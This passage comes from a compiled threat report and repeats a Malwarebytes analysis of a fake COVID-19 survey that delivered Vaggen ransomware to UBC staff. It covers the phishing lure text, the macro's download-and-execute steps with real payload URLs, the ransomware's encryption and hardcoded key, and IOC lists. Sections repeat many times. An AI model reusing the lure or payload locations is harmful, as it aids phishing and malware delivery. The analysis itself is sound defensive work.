3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 855 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 856 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 857 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 858 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 859 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 860 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 861 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 862 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 863 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 864 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 865 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 866 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 867 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 868 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 869 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 870 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 871 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 872 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 873 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 874 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 875 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 876 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 877 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 878 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 879 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 880 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 881 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 882 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 883 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 884 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 885 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 886 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office